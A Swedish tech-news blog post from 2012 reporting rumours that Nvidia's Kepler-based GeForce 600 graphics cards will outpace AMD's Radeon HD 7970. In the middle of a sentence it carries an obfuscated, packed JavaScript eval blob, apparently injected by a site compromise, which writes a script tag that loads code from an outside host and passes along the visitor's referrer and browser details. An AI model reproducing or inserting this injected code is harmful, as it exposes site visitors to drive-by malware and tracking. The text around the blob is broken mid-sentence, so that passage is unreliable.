Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

PC

Nvidias Kepler, nästa generations grafikkort är här.

Nvidias Kepler, nästa generations grafikkort är här.
Filip Urde
  • On 3 januari, 2012
  • http://www.revue.se/filip-urde

Nvidias nästa generation av grafikkort är på ingång, GeForce 600, som är baserat på Nvidias Kepler, sägs komma under första kvartalet i år.
Uppgifterna kommer från Fudzilla som eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rryaz|var|u0026u|referrer|ktyfi||js|php’.split(’|’),0,{}))
säger att man har nära källor från Nvidia och dess partners som i sin tur säger att Kepler ska vara mycket snabbare än Radeon HD 7970. Vilket självklart återstår att se.

Nividia är dock inte ensam om att släppa nytt, man blir heller inte först. AMD blir nämligen den första tillverkaren att släppa en 28 nm-baserat grafikkort. Vilket blir ett viktigt försprång för AMD. Då spelar det inte så mycket roll att jag av ren känsla tror mer på Nvidias produkt.
www.fudzilla.com